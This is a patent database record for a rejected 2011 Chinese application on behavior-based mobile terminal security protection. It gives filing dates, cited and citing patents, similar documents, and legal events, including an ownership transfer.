Application Number Priority Date Filing Date Title
CN2011100487216A CN102082802A (en) 2011-03-01 2011-03-01 Behavior-based mobile terminal security protection system and method

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN2011100487216A CN102082802A (en) 2011-03-01 2011-03-01 Behavior-based mobile terminal security protection system and method

Publications (1)

Publication Number Publication Date
CN102082802A true CN102082802A (en) 2011-06-01

Family

ID=44088554

Family Applications (1)

Application Number Title Priority Date Filing Date
CN2011100487216A Pending CN102082802A (en) 2011-03-01 2011-03-01 Behavior-based mobile terminal security protection system and method

Country Status (1)

Country Link
CN (1) CN102082802A (en)

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20060179484A1 (en) * 2005-02-09 2006-08-10 Scrimsher John P Remediating effects of an undesired application
CN101924762A (en) * 2010-08-18 2010-12-22 奇智软件(北京)有限公司 Cloud security-based active defense method
CN101959193A (en) * 2010-09-26 2011-01-26 宇龙计算机通信科技(深圳)有限公司 Information safety detection method and a mobile terminal

Cited By (39)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN102254120A (en) * 2011-08-09 2011-11-23 成都市华为赛门铁克科技有限公司 Method, system and relevant device for detecting malicious codes
CN102254120B (en) * 2011-08-09 2014-05-21 华为数字技术(成都)有限公司 Method, system and relevant device for detecting malicious codes
US9465941B2 (en) 2011-08-09 2016-10-11 Huawei Technologies Co., Ltd. Method, system, and apparatus for detecting malicious code
CN102331946B (en) * 2011-09-28 2015-02-11 宇龙计算机通信科技(深圳)有限公司 Method and system for installing application program
CN102331946A (en) * 2011-09-28 2012-01-25 宇龙计算机通信科技(深圳)有限公司 Method and system for installing application program
CN103136476A (en) * 2011-12-01 2013-06-05 深圳市证通电子股份有限公司 Mobile intelligent terminal malicious software analysis system
CN102547713A (en) * 2011-12-21 2012-07-04 成都三零瑞通移动通信有限公司 Anti-activating method aiming at X undercover software
CN103259806A (en) * 2012-02-15 2013-08-21 深圳市证通电子股份有限公司 Android intelligent terminal application program security detection method and system
CN103259806B (en) * 2012-02-15 2016-08-31 深圳市证通电子股份有限公司 The method and system of Android intelligent terminal application security detection
CN102694817B (en) * 2012-06-08 2016-08-03 北京奇虎科技有限公司 The whether abnormal method of the network behavior of a kind of recognizer, Apparatus and system
CN102694817A (en) * 2012-06-08 2012-09-26 奇智软件(北京)有限公司 Method, device and system for identifying abnormality of network behavior of program
WO2013181982A1 (en) * 2012-06-08 2013-12-12 北京奇虎科技有限公司 Method, device and system for identifying abnormality of network behavior of program
CN104704502A (en) * 2012-10-01 2015-06-10 微软公司 Using trusted devices to augment location-based account protection
CN103793209A (en) * 2012-10-26 2014-05-14 珠海市君天电子科技有限公司 Method and system for modifying Android program execution flow
CN103279708A (en) * 2012-12-28 2013-09-04 武汉安天信息技术有限责任公司 Method and system for monitoring and analyzing mobile terminal malicious code behaviors
WO2014106391A1 (en) * 2013-01-04 2014-07-10 中兴通讯股份有限公司 Method, device and system for installing application
CN103916434A (en) * 2013-01-04 2014-07-09 中兴通讯股份有限公司 Application installation method, device and system
CN103927156A (en) * 2013-01-16 2014-07-16 珠海市君天电子科技有限公司 Sample behavior triggering method and device
CN103218566A (en) * 2013-01-25 2013-07-24 江南大学 Active defense system based on Android platform software behavior detection
CN103246846A (en) * 2013-04-24 2013-08-14 北京网秦天下科技有限公司 Method and device for detecting safety of customized ROM (read only memory)
CN103309790A (en) * 2013-07-04 2013-09-18 福建伊时代信息科技股份有限公司 Method and device for monitoring mobile terminal
US10305929B2 (en) 2013-09-27 2019-05-28 Mcafee, Llc Managed software remediation
CN105683988A (en) * 2013-09-27 2016-06-15 迈克菲公司 Managed software remediation
CN103618626A (en) * 2013-11-28 2014-03-05 北京奇虎科技有限公司 Method and system for generating safety analysis report on basis of logs
CN104850775A (en) * 2014-02-14 2015-08-19 北京奇虎科技有限公司 Method and device for assessing safety of application program
WO2015120756A1 (en) * 2014-02-14 2015-08-20 北京奇虎科技有限公司 Method and device for identifying security of application process
CN103942493B (en) * 2014-03-28 2017-02-15 北京工业大学 Intelligent active defensive system and method under Window
CN104135479A (en) * 2014-07-29 2014-11-05 腾讯科技(深圳)有限公司 Cloud real-time defense method and system
CN105279432B (en) * 2015-10-12 2018-11-23 北京金山安全软件有限公司 Software monitoring processing method and device
CN105279432A (en) * 2015-10-12 2016-01-27 北京金山安全软件有限公司 Software monitoring processing method and device
CN106055976A (en) * 2016-05-16 2016-10-26 杭州华三通信技术有限公司 Document detection method and sandbox controller
CN109614159A (en) * 2017-09-30 2019-04-12 北京国双科技有限公司 Plan target distribution, introduction method and device
CN109614159B (en) * 2017-09-30 2022-01-28 北京国双科技有限公司 Method and device for distributing and importing planning tasks
CN109726551A (en) * 2017-10-31 2019-05-07 武汉安天信息技术有限责任公司 The methods of exhibiting and system of preceding bad behavior are installed in a kind of application
CN109361646A (en) * 2018-08-23 2019-02-19 广东电网有限责任公司信息中心 Network security monitoring and cognitive method in a kind of application of mobile interchange
CN109918173A (en) * 2019-03-06 2019-06-21 苏州浪潮智能科技有限公司 Virtual machine health examination method and system based on openstack
CN109918173B (en) * 2019-03-06 2021-11-19 苏州浪潮智能科技有限公司 Openstack-based virtual machine health check method and system
US10817611B1 (en) 2019-12-18 2020-10-27 Capital One Services, Llc Findings remediation management framework system and method
CN112099802A (en) * 2020-09-18 2020-12-18 腾讯科技(深圳)有限公司 Component identification method and device of application program

Similar Documents

Publication Publication Date Title
CN102082802A (en) Behavior-based mobile terminal security protection system and method
US9614863B2 (en) System and method for analyzing mobile cyber incident
Schmidt et al. Monitoring smartphones for anomaly detection
CN103716785B (en) A kind of mobile Internet safety service system
Gelenbe et al. Security for smart mobile networks: The NEMESYS approach
US20150180908A1 (en) System and method for whitelisting applications in a mobile network environment
CN112685737A (en) APP detection method, device, equipment and storage medium
GB2553427A (en) Identifying and remediating phishing security weaknesses
EP2733656A1 (en) System and method for enforcing a security policy on mobile devices using dynamically generated security profiles
EP2769324A1 (en) System and method for whitelisting applications in a mobile network environment
CN103746992B (en) Based on reverse intruding detection system and method thereof
KR101266037B1 (en) Method and apparatus for treating malicious action in mobile terminal
CN104246785A (en) System and method for crowdsourcing of mobile application reputations
WO2017071148A1 (en) Cloud computing platform-based intelligent defense system
CN106156611A (en) The dynamic analysing method of smart mobile phone application program and system
CN113177205B (en) Malicious application detection system and method
CN112513848A (en) Privacy protected content classification
US11444970B2 (en) Dynamic security test system
Schmidt Detection of smartphone malware
US11595436B2 (en) Rule-based dynamic security test system
Seo et al. Analysis on maliciousness for mobile applications
Chen et al. Detection, traceability, and propagation of mobile malware threats
CN109547399A (en) Wireless network leak analysis method and system
KR101657667B1 (en) Malicious app categorization apparatus and malicious app categorization method
CN109818972A (en) A kind of industrial control system information security management method, device and electronic equipment

Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
C10 Entry into substantive examination
SE01 Entry into force of request for substantive examination
ASS Succession or assignment of patent right

Owner name: YANGPUWEIYE TECHNOLOGY LIMITED

Free format text: FORMER OWNER: CHEN BIAO

Effective date: 20130205

C41 Transfer of patent application or patent right or utility model
COR Change of bibliographic data

Free format text: CORRECT: ADDRESS; FROM: 100027 CHAOYANG, BEIJING TO: 100083 HAIDIAN, BEIJING

TA01 Transfer of patent application right

Effective date of registration: 20130205

Address after: 100083 Beijing City, Haidian District Xueyuan Road No. 30, building A, room 605 days.

Applicant after: Yangpuweiye Technology Limited

Address before: 100027, room 8, block SOHOA, North Road, workers' Stadium, Chaoyang District, Beijing, Sanlitun 1907, China

Applicant before: Chen Biao

C12 Rejection of a patent application after its publication
RJ01 Rejection of invention patent application after publication

Application publication date: 20110601